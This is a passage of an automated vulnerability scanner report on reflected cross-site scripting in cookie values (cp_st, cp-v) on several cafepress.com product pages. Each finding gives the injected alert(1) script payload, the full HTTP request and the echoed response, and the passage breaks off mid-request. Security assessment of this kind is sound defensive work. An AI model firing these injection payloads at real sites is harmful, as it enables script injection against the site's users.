1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-mugs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0403</script><script>alert(1)</script>51550576faa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d0403</script><script>alert(1)</script>51550576faa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 53764 Date: Sun, 26 Dec 2010 13:48:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 53764 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'd0403</script><script>alert(1)</script>51550576faa ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 181d3"-alert(1)-"e0b5be905e5 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 55169 Date: Sun, 26 Dec 2010 13:48:14 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55169 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4548</script><script>alert(1)</script>1bf2219952e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a4548</script><script>alert(1)</script>1bf2219952e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55191 Date: Sun, 26 Dec 2010 13:48:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55191 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'a4548</script><script>alert(1)</script>1bf2219952e ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a524"-alert(1)-"630f88fb7a4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-stockings HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 52631 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 52631 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75fbc</script><script>alert(1)</script>3209aface0d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-stockings HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=75fbc</script><script>alert(1)</script>3209aface0d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 52650 Date: Sun, 26 Dec 2010 13:48:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 52650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '75fbc</script><script>alert(1)</script>3209aface0d ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-t-shirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8dde"-alert(1)-"0740f775c1c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 